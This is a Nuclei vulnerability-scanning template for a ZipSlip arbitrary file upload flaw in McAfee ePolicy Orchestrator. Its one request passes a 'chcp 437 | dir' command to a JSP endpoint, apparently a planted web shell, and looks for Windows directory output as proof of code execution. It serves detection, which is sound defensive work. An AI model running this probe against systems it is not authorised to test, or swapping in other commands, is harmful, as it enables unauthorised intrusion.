id: mcafee-epo-rce

info:
  name: McAfee ePolicy Orchestrator - Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    McAfee ePolicy Orchestrator (ePO) is vulnerable to a ZipSlip vulnerability which allows arbitrary file upload when archives are unpacked if the names of the packed files are not properly sanitized. An attacker can create archives with files containing "../" in their names, making it possible to upload arbitrary files to arbitrary directories or overwrite existing ones during archive extraction.
  reference:
    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
  metadata:
    max-request: 1
  tags: mcafee,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/stat.jsp?cmd=chcp+437+%7c+dir"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "text/html"
        part: header

      - type: regex
        regex:
          - "Volume (in drive [A-Z]|Serial Number) is"
        part: body
# digest: 4b0a00483046022100b2803bf3e2af2d31330e8aea3dc1c0e1d81017090aaaec3c762903720b17597a022100ee07d286019b44c10df226e675426d89a3334cd5906ddf91b6fa9f6a6ad1a8fc:922c64590222798bb761d5b6d8e72950